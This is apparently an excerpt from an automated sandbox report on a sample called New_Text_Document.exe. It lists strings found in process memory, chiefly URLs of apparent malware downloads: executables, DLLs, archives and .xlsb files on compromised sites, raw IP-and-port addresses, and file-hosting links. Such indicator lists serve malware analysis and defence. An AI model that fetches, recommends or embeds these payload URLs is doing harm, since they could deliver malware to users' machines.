                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://99.2.117.58:57775/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://99.229.166.103:31729/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://99.73.209.178:47303/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aa.jaoaaoas11.com/m/zoeg4a5.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://acesseinfo.com.br/aaue/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://akhtarweb.com/autfugit/i.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://alhoja.info/fega/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://alinac.ca/images/Lp6yKpIpRf6/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://amandasasso.com.br/tup/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://americantv.online/12/data64_6.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://americantv.online/15/data64_1.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://americantv.online/15/data64_4.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://americantv.online/16/data64_4.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anamurziraatodasi.org.tr/oiot/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://andrewpharma.com/ost/NjKVUWPAuvq4Sr/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://andrewpharma.com/wp-includes/KKXAiWGL/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://andrewpharma.com/wp-includes/d8yxEkWRUU/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aosafrica.co.za/5j1ae/ApMYYqsc6Q3p5Y/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api-ms.cobainaja.id/hceioc.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://apps.saintsoporte.com/TaAgente.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://artmediastudio.ro/Amdau.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ascend.macronator.biz/bot/compiled/Ascend.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://asu.com.vn/wp-content/plugins/super-forms/uploads/php/files/5b89t0vnfvij2gel1tdaoghhsi/vunate
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://awdtechnologies.com/rt/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://babaandsons.in/ud/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bacfl.com/roa/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bigmikesupplies.co.za/m7bu952.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bitbucket.org/pavelalekseev11/346346/downloads/socks5-clean.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://black-sun-a335.asyorfplmnv.workers.dev/mnwODBptK6jU/5hwtrLyyHFiv/7b0985c861986ec9e2087ade8273
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bluechipfx.com/ir/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://boolimagens.com.br/eu/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://british-shorthair.es/axe/DKFSGF2M/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://british-shorthair.es/axe/tWL/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://brknarikan.com/upload/Statement000487291011.xlsb
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://brknarikan.com/upload/Statement000487291016.xlsb
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://brknarikan.com/upload/Statement000487291017.xlsb
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://brknarikan.com/upload/Statement000487291018.xlsb
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://brknarikan.com/upload/Statement000487291019.xlsb
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bruiserbodies.com/images/vAj7fuqYe5y9.bak/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://burgerbuddy.in/qui/
                    Source: raserver.exe, 00000014.00000003.1558158883.0000000007CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033CF000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.000000000351F000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003532000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000013.00000002.1457656685.000001947FAC3000.00000004.00000001.00020000.00000000.sdmp, raserver.exe, 00000014.00000003.1558158883.0000000007CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: explorer.exe, 0000000C.00000000.1298597652.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2519047272.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2272829573.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2502572191.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1291540704.0000000007306000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                    Source: raserver.exe, 00000014.00000003.1558158883.0000000007CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033CF000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.000000000351F000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000013.00000002.1457656685.000001947FAC3000.00000004.00000001.00020000.00000000.sdmp, raserver.exe, 00000014.00000003.1558158883.0000000007CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033CF000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.000000000351F000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000013.00000002.1457656685.000001947FAC3000.00000004.00000001.00020000.00000000.sdmp, raserver.exe, 00000014.00000003.1558158883.0000000007CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://camminachetipassa.it/icaqf83fflrlm6d8xqfk1sgl4zq4eqtasmy1bgnvg6fmcbya89ia6iid5qwtsuhb/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://casamuseoayerbe.co/cgi-bin/ZQ2d3dEWvlA1pXG/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cd.textfiles.com/hmatrix/Data/hack1226.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cdaonline.com.ar/wp-admin/FILE/x7Z9wBk77Tt6v9/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cdaonline.com.ar/wp-admin/bXjesdj7W3meuh7iAtiURBsgh/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.000000000347B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cdn.discordapp.com
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cecan.org.br/aest/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cfs10.blog.daum.net/upload_control/download.blog?fhandle=MDczaFhAZnMxMC5ibG9nLmRhdW0ubmV0Oi9J
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cfs13.tistory.com/upload_control/download.blog?fhandle=YmxvZzE5MTk5NUBmczEzLnRpc3RvcnkuY29tOi
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cfs5.tistory.com/upload_control/download.blog?fhandle=YmxvZzcxMzYyQGZzNS50aXN0b3J5LmNvbTovYXR
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cfs7.blog.daum.net/upload_control/download.blog?fhandle=MEtnWE5AZnM3LmJsb2cuZGF1bS5uZXQ6L0lNQ
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cfs9.blog.daum.net/upload_control/download.blog?fhandle=MEp5eURAZnM5LmJsb2cuZGF1bS5uZXQ6L0lNQ
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.000000000347B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://china.dhabigroup.top
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://china.dhabigroup.top/_errorpages/obizx.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://china.dhabigroup.top/_errorpages/owenzx.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://china.dhabigroup.top/_errorpages/plugmanzx.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://china.dhabigroup.top/_errorpages/sbin22zx.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.000000000347B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://china.dhabigroup.top/_errorpages/sbinzx.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://chiptune.com/razor/rzr-winner_intro.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cipani.in/sof64t.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clinichealth.com.br/evi/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cloud.restoro.com//download/sa/Restoro.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cloud.restoro.com/download/2105/RestoroSetup64.exe
